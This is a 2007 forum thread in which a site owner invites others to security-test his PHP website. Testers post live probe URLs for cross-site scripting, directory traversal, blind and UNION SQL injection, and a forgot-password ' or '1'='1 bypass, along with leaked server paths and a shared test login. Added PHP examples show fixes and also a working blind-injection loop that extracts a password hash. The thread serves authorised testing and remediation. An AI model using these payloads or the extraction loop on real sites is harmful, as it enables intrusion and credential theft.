BillyBoB Posted July 9, 2007

My site is http://dreamshowstudios.net. You can rate it and test it. Please do not create a username unless you plan on staying with the site. Testers, please use Username: Tester, Password: Helper.

Link to comment https://forums.phpfreaks.com/topic/59043-security-test/
agentsteal Posted July 9, 2007

Admin Access: I got your username and password with a cookie stealer.

Array: http://www.dreamshowstudios.net/programs.php?id[]
Array: http://dreamshowstudios.net/viewpic.php?full[]

Cross Site Scripting: http://dreamshowstudios.net/pm.php?dignore=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.dreamshowstudios.net/programs.php?id=<marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.dreamshowstudios.net/viewpic.php?pic="><marquee><h1>vulnerable</marquee>
Cross Site Scripting: There is Cross Site Scripting if you send a message that contains code.
Cross Site Scripting: There is Cross Site Scripting in the Shoutbox.
Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.

Directory Traversal: http://www.dreamshowstudios.net/viewpic.php?pic=../Images/splash

Drop Down Menu: If you edit the drop down menu on http://www.dreamshowstudios.net/viewpic.php you can submit arbitrary values.

Full Path Disclosure: http://www.dreamshowstudios.net/forums/index.php?action[]
    Notice: Array to string conversion in /home/dreamsh/public_html/forums/Sources/QueryString.php on line 245
    Notice: Array to string conversion in /home/dreamsh/public_html/forums/Sources/QueryString.php on line 247
Full Path Disclosure: http://www.dreamshowstudios.net/forums/index.php?board[]
    Notice: Array to string conversion in /home/dreamsh/public_html/forums/Sources/QueryString.php on line 198
Full Path Disclosure: http://www.dreamshowstudios.net/members.php?&pg=-1
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dreamsh/public_html/members.php on line 116
Full Path Disclosure: http://www.dreamshowstudios.net/members.php?&pg[]
    Fatal error: Unsupported operand types in /home/dreamsh/public_html/members.php on line 108
Full Path Disclosure: http://www.dreamshowstudios.net/pm.php?pto=Tester
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dreamsh/public_html/pm.php on line 290
Full Path Disclosure: There is Full Path Disclosure in the Shoutbox.
    Fatal error: Cannot redeclare pagination() (previously declared in /home/dreamsh/public_html/functions.php:2) in /home/dreamsh/public_html/functions.php on line 2
Full Path Disclosure: There is Full Path Disclosure when you register.
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dreamsh/public_html/register.php on line 117

Includes Directory: http://www.dreamshowstudios.net/h2/

Insecure Cookie: You shouldn't put the password in the cookie.
Insecure Cookie: You shouldn't put the username in the cookie.

Maximum Length: If you edit the input boxes in your profile you can remove the maximum lengths.

PHP Source Code Disclosure: http://www.dreamshowstudios.net/backup/
PHP Source Code Disclosure: You have added deletexss('A Distraction04') to your ignorelist

SQL Injection:
    http://www.dreamshowstudios.net/pm.php?func=del&mid=52 AND 1=1
    http://www.dreamshowstudios.net/pm.php?func=del&mid=52 AND 1=2
SQL Injection:
    http://www.dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=1
    http://www.dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=2
SQL Injection:
    http://www.dreamshowstudios.net/programs.php?id=3 AND 1=1
    http://www.dreamshowstudios.net/programs.php?id=3 AND 1=2
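The findings above fall into a handful of root causes: a GET parameter that can be an array as well as a string, raw request values concatenated into SQL, unencoded output, a filename taken straight from the URL, and PHP error messages rendered into the page. The following is an added example written for this thread, not code from dreamshowstudios.net, showing one hardened handler for all five. The table and column names (programs: id, name, file) and the image directory layout are assumptions; the sample data is constructed so the script runs from the command line.

```php
<?php
// Added example, not code from dreamshowstudios.net: one hardened handler
// covering the Array, SQL Injection, Cross Site Scripting, Directory
// Traversal and Full Path Disclosure findings above. Table and column
// names (programs: id, name, file) are assumptions.
declare(strict_types=1);

// Full Path Disclosure is PHP printing notices/warnings into the page.
// Set this in php.ini for the whole site; shown here so the example is complete.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// ?id[] arrives as a PHP array, not a string, which is where "Array" in the
// error messages comes from. Accept only a short decimal string, so
// "3 AND 1=2", "<marquee>" and id[] are all rejected before any SQL is built.
function read_int_param(array $src, string $name): ?int
{
    if (!isset($src[$name]) || !is_string($src[$name])) {
        return null;
    }
    $v = $src[$name];
    return (ctype_digit($v) && strlen($v) <= 9) ? (int) $v : null;
}

// SQL Injection: the id is bound as a parameter, never concatenated.
function fetch_program(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, name, file FROM programs WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Directory Traversal (?pic=../Images/splash): resolve the request against
// a fixed directory and require the canonical path to stay inside it.
function resolve_picture(string $imageDir, $pic): ?string
{
    if (!is_string($pic) || $pic === '') {
        return null;
    }
    $base = realpath($imageDir);
    $path = realpath($imageDir . DIRECTORY_SEPARATOR . $pic);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Trailing separator: /srv/pics2/x must not pass as inside /srv/pics.
    return strpos($path, $base . DIRECTORY_SEPARATOR) === 0 ? $path : null;
}

// Cross Site Scripting: encode on output. ENT_QUOTES also covers the
// "><marquee> case, where the value lands inside a quoted attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// ---- self-contained check with constructed data (run from the CLI) ----
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE programs (id INTEGER PRIMARY KEY, name TEXT, file TEXT)');
$db->exec("INSERT INTO programs VALUES (3, 'Demo <b>app</b>', 'demo.zip')");

foreach (['3', '3 AND 1=2', '<marquee><h1>vulnerable</marquee>', ['x']] as $raw) {
    $id  = read_int_param(['id' => $raw], 'id');
    $row = $id === null ? null : fetch_program($db, $id);
    printf("id=%-38s -> %s\n", json_encode($raw), $row ? h($row['name']) : 'rejected');
}

$pics    = sys_get_temp_dir() . '/pics_' . bin2hex(random_bytes(4));
$outside = $pics . '_outside';
mkdir($pics); mkdir($outside);
touch("$pics/splash.jpg"); touch("$outside/secret.jpg");

var_dump(resolve_picture($pics, 'splash.jpg') !== null);                       // bool(true)
var_dump(resolve_picture($pics, '../' . basename($outside) . '/secret.jpg'));  // NULL: outside base
var_dump(resolve_picture($pics, ['x']));                                       // NULL: ?pic[] is an array

unlink("$pics/splash.jpg"); unlink("$outside/secret.jpg"); rmdir($pics); rmdir($outside);
```

Only the id=3 case reaches the database and its name is printed as `Demo &lt;b&gt;app&lt;/b&gt;`; the other three are rejected before a query exists. The same three functions cover pm.php's `mid`, members.php's `pg` (which also needs a lower bound of 1 to stop `pg=-1`) and viewpic.php's `full` parameter.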
source Posted July 9, 2007

1) XSS in the shoutbox
2) http://dreamshowstudios.net/h2/
3) messages are vulnerable to XSS
4) XSS in the edit profile fields.
BillyBoB Posted July 9, 2007

Blind SQL injection??? How could this happen? All it does is take info from the db on that page, if that; actually I think it just uses the $_GET to name the dl. Also, how do I fix the XSS bug?

http://dreamshowstudios.net/programs.php?id[]
Unknown column 'Array' in 'where clause'

What would this do??
source Posted July 9, 2007

http://dreamshowstudios.net/viewpic.php?pic=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
BillyBoB Posted July 9, 2007

Table 'dreamsh_dss.whatever' doesn't exist

The db name is dreamsh_dss.

http://dreamshowstudios.net/programs.php?id=3 UNION ALL SELECT null, null, null FROM whatever

This can only get info??
source Posted July 9, 2007

On forgotpass.php I think ' or '1'='1 may send the password to the first user; however, I cannot check... it does not give errors (so I assume it does).
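The two questions in this part of the thread (what the 1=1 / 1=2 pair and the UNION probe actually give an attacker, and what a quote-and-OR payload does to a forgot-password lookup) are easiest to answer by running the vulnerable pattern against a throwaway database. This is an added example written for this thread, not the site's code; the programs and users tables, the admin row and its md5('password') hash are constructed, and SQLite stands in for MySQL (on MySQL the same payloads work, and the error text additionally names the database, as the 'dreamsh_dss.whatever' message shows).

```php
<?php
// Added example, not code from dreamshowstudios.net: what an attacker can do
// with the "3 AND 1=1" / "3 AND 1=2" pair and the forgotpass.php guess above.
// Table and column names (programs, users, password, email) are constructed.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE programs (id INTEGER PRIMARY KEY, name TEXT, file TEXT)');
$db->exec("INSERT INTO programs VALUES (3, 'Demo', 'demo.zip')");
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT, email TEXT)');
// Constructed row; the hash is md5('password').
$db->exec("INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.invalid')");

// The vulnerable pattern: $_GET['id'] dropped straight into the query.
// Returns the only thing the attacker can see from outside: did a program render?
function programs_page(PDO $db, string $id): bool
{
    try {
        $rows = $db->query("SELECT name FROM programs WHERE id = $id")->fetchAll();
        return count($rows) > 0;
    } catch (PDOException $e) {
        return false;   // with display_errors on, the message would be shown instead
    }
}

// The same flaw in a string context, as on a forgot-password form.
function forgotpass_lookup(PDO $db, string $username): ?string
{
    $row = $db->query("SELECT email FROM users WHERE name = '$username'")->fetch();
    return $row === false ? null : $row['email'];
}

// Boolean-blind extraction: one request per candidate character. The page
// never prints the password, but it answers "row or no row" for any condition,
// and that single bit per request is enough to read any column in the database.
function extract_blind(callable $oracle, string $subquery, string $charset, int $maxLen): string
{
    $out = '';
    for ($pos = 1; $pos <= $maxLen; $pos++) {
        $hit = null;
        foreach (str_split($charset) as $c) {
            if ($oracle("3 AND substr(($subquery), $pos, 1) = '$c'")) {
                $hit = $c;
                break;
            }
        }
        if ($hit === null) {
            break;      // the value is shorter than $maxLen
        }
        $out .= $hit;
    }
    return $out;
}

$oracle = fn(string $id): bool => programs_page($db, $id);
var_dump($oracle('3 AND 1=1'));   // bool(true):  program shown
var_dump($oracle('3 AND 1=2'));   // bool(false): nothing shown, so the injected condition is evaluated

$hash = extract_blind($oracle, "SELECT password FROM users WHERE name = 'admin'", '0123456789abcdef', 32);
echo "recovered: $hash\n";        // 5f4dcc3b5aa765d61d8327deb882cf99

// The UNION probe: the error names the missing table (on MySQL, with the
// database prefix). Once the column count matches, the nulls are replaced
// by real columns and the data is printed where the program name would be.
try {
    $db->query('SELECT name FROM programs WHERE id = 3 UNION ALL SELECT null FROM whatever');
} catch (PDOException $e) {
    echo "error leaked: " . $e->getMessage() . "\n";
}

// String context: the quote closes the literal and OR makes the WHERE true
// for every row, so the first user's address comes back.
echo forgotpass_lookup($db, "' OR '1'='1") . "\n";   // admin@example.invalid
```

The extraction loop costs at most 16 requests per character here; a binary search on the character code cuts that to 7, and time-based variants (SLEEP() on MySQL) work even when the page shows no difference at all. The fix is the same in every case: a parameterised query, as in the earlier example in this thread, so that the value can never change the shape of the SQL.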
BillyBoB Posted July 9, 2007

Could you give me advice on how to fix some of this?
source Posted July 9, 2007

Your registration system is BUGGED... it gave me "email failed" (or some error like that), yet the user still appears in the userlist. Same thing with <script>alert("xss");</script>, so limit the username length with PHP (server side), not something client side (HTML).
source Posted July 9, 2007

http://dreamshowstudios.net/h2/mod.php
source Posted July 9, 2007

http://dreamshowstudios.net/members.php?&pg=-1
BillyBoB Posted July 9, 2007

agentsteal, please tell me how to fix these errors, don't just notify me I have them. And I thought I said don't register..... this makes me have to go and delete...
source Posted July 9, 2007

Meh, you need to use strip_tags...

P.S. you deleted the tester account :'( *source tears*

Agentsteal, roflmao @ the iframe. xD
BillyBoB Posted July 9, 2007

source, could you help explain?
source Posted July 9, 2007

Well, using something like:

$usern=stripslashes($usern);
$usern=strip_tags($usern);
$usern=mysql_real_escape_string($usern);

etc. (make it a function if you use it a lot) will filter the input and make it hard to XSS/SQL inject... Making an array and using str_replace($arrayvariable, " ", "$whattofilter") can also help if you don't want a couple of different characters/words allowed (but it can be bypassed).

EDIT: goodnight.
BillyBoB Posted July 9, 2007

The Tester is back up and the programs page should be fixed. Check please.
BillyBoB Posted July 9, 2007

How??
source Posted July 9, 2007

Wait a sec...... WHY the heck are you md5ing passwords and setting them to a cookie? That's dangerous... a cookie stealer could have been made and stolen your cookie, then I would have cracked it and had your password.
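Two of the points raised in this thread share one fix: the registration check that has to live in PHP rather than in an HTML maxlength attribute, and the login that must not put the username or an md5 of the password into a cookie. What follows is an added example written for this thread, not the site's code. It assumes a users table with id, username and password_hash columns, the length limits shown, and PHP 7.3 or later for the array form of session_set_cookie_params(); the sample rows are constructed so the script runs from the command line (the session function is only meaningful under a web server, so the check at the bottom does not call it).

```php
<?php
// Added example, not code from dreamshowstudios.net: server-side username
// checks for registration and a login that keeps no password material in
// the cookie. The users table (id, username, password_hash) and the length
// limits are assumptions.
declare(strict_types=1);

const USERNAME_MIN = 3;
const USERNAME_MAX = 20;

// The HTML maxlength attribute is a hint the client can edit away; the real
// limit, and the character set, are enforced here. A name that fails this
// check never reaches the INSERT, so "<script>alert(...)</script>" cannot
// land in the userlist whatever the mail step does afterwards.
function validate_username($raw): ?string
{
    if (!is_string($raw)) {
        return null;
    }
    $len = strlen($raw);
    if ($len < USERNAME_MIN || $len > USERNAME_MAX) {
        return null;
    }
    return preg_match('/\A[A-Za-z0-9_]+\z/', $raw) === 1 ? $raw : null;
}

// Store a salted, slow hash (bcrypt via PASSWORD_DEFAULT), not md5.
function register(PDO $db, $username, string $password): bool
{
    $u = validate_username($username);
    if ($u === null || strlen($password) < 8) {
        return false;
    }
    $stmt = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
    try {
        return $stmt->execute([$u, password_hash($password, PASSWORD_DEFAULT)]);
    } catch (PDOException $e) {
        return false;   // UNIQUE constraint: the name is already taken
    }
}

// Returns the user id on success, null on any failure (the same answer for
// "no such user" and "wrong password", so names cannot be enumerated).
function check_login(PDO $db, $username, string $password): ?int
{
    $u = validate_username($username);
    if ($u === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute([$u]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// Web handler only (it sends headers): after check_login() succeeds the
// browser receives an opaque session id and nothing else. HttpOnly keeps it
// away from injected script, so a cookie stealer has nothing useful to take;
// the username and the hash never leave the server.
function start_authenticated_session(int $userId): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,      // HTTPS only
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
    session_regenerate_id(true);   // never keep a pre-login session id
    $_SESSION['user_id'] = $userId;
}

// ---- self-contained check with constructed data (run from the CLI) ----
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT UNIQUE NOT NULL, password_hash TEXT NOT NULL)');

var_dump(register($db, 'Tester', 'correct horse battery'));             // bool(true)
var_dump(register($db, 'Tester', 'another password'));                  // bool(false): name taken
var_dump(register($db, '<script>alert("xss");</script>', 'whatever1')); // bool(false): charset
var_dump(register($db, str_repeat('a', 200), 'whatever1'));             // bool(false): length
var_dump(check_login($db, 'Tester', 'correct horse battery'));          // int(1)
var_dump(check_login($db, 'Tester', 'Helper'));                         // NULL
```

Because the second register() call fails on the UNIQUE constraint, the "someone registered Tester over the top of the Tester account" situation later in this thread cannot happen with this schema. If a "remember me" cookie is wanted on top of the session, it should carry a random token looked up in its own table, never anything derived from the password.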
source Posted July 9, 2007

http://dreamshowstudios.net/forums/index.php?topic[]
"Notice: Array to string conversion in /home/dreamsh/public_html/forums/Sources/QueryString.php on line 224"

Interesting.
BillyBoB Posted July 9, 2007

Another Blind SQL Injection:
http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=1
http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=2

Error fixed.
BillyBoB Posted July 9, 2007

The forums aren't custom built, it's an SMF...
BillyBoB Posted July 9, 2007

Another Blind SQL Injection:
http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=1
http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=2

Error fixed.

nope...

Yes:
http://dreamshowstudios.net/pm.php?pto=Tester&mid=48 UNION ALL SELECT null, null, null FROM whatever

There, lol, fixed now. Just didn't add the var, it was still $_GET.
source Posted July 9, 2007

BTW: I just tried to register the username Tester and p/w password and it said it worked... (Yeah, I know you said not to, but I couldn't resist.) Roflmao, now no one can login with Tester because I need to validate the account (but the email I used to register was "password"). xD
BillyBoB Posted July 9, 2007

That's how it's built.
BillyBoB Posted July 9, 2007

You should block this directory: http://dreamshowstudios.net/programs/

Done.